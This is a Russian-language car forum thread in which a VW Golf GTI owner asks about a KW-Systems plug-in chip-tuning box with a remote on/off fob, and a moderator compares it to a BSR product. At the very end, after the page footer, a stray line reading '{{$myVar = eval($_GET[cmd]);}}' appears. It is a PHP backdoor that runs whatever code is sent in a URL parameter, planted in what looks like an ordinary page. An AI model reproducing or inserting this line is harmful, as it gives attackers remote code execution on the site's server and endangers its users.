+ Ответить в теме
Показано с 1 по 2 из 2

Тема: Чип тюнинг KW-Systems. Кто пробовал ?


  1. #1
    Всем доброго дня суток. Я в ожидании своей новой машины, VW Golf GTI 2.0 TFSI DSG. Решил поставить чип-тюнинг, посмотрел по интернету. Для прошивки нужно снимать блок и отправлять его фирме. Так как в моей стране нет тюнеров, кто делает чиповку, то возникают проблемы с затаможкой и растаможкой... Потом вопросы связанные с гарантией на авто в случае чиповки...Наткнулся на сайт www.kw-systems.de . Они предлагают блок, который подключается к штатному разъему ЭБУ автомобиля. Для GTI обещают 240 л.с и 350 н.м (больше как я понял DSG не выдерживает). Кроме этого в комплект входит брелок с помощью которого можно дистанционно включать/выключать чип. То есть можно ездить со стандартной программой, так и с тюнинговой. Стоимость с доставкой курьером мне выкатили 1250 Евро. Думаю брать или нет. деньги не маленькие. Может быть кто то уже пробовал и поделиться своим мнением ? Заранее всем спасибо !

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(umidka &#064; Jul 27 2007, 10&#58;15) <{POST_SNAPBACK}></div><div class='quotemain'>Всем доброго дня суток. Я в ожидании своей новой машины, VW Golf GTI 2.0 TFSI DSG. Решил поставить чип-тюнинг, посмотрел по интернету. Для прошивки нужно снимать блок и отправлять его фирме. Так как в моей стране нет тюнеров, кто делает чиповку, то возникают проблемы с затаможкой и растаможкой... Потом вопросы связанные с гарантией на авто в случае чиповки...Наткнулся на сайт www.kw-systems.de . Они предлагают блок, который подключается к штатному разъему ЭБУ автомобиля. Для GTI обещают 240 л.с и 350 н.м (больше как я понял DSG не выдерживает). Кроме этого в комплект входит брелок с помощью которого можно дистанционно включать/выключать чип. То есть можно ездить со стандартной программой, так и с тюнинговой. Стоимость с доставкой курьером мне выкатили 1250 Евро. Думаю брать или нет. деньги не маленькие. Может быть кто то уже пробовал и поделиться своим мнением ? Заранее всем спасибо &#33;[/b][/quote]

    Похожая штука давно есть у известной шведской конторы BSR. Удобство оценить трудно, разве что для тех кто боится быть разоблаченным официалами.
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме

Похожие темы

  1. Чип тюнинг
    от ToyStar в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 7
    Последнее сообщение: 02.10.2023, 04:20
  2. а кстати Vogtland кто пробовал?
    от SMokED в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 25
    Последнее сообщение: 24.01.2012, 18:40
  3. Доработки выпускной системы (exhaust systems tuning)
    от ААГ в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 0
    Последнее сообщение: 27.01.2010, 10:17
  4. кто нить пробовал с клапаном вещь делать?
    от veteromska в разделе Двигатель
    Ответов: 10
    Последнее сообщение: 10.08.2009, 10:31
  5. Тюнинг 1.4 Tsi
    от crazy_engineer в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 14
    Последнее сообщение: 31.10.2008, 20:43

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}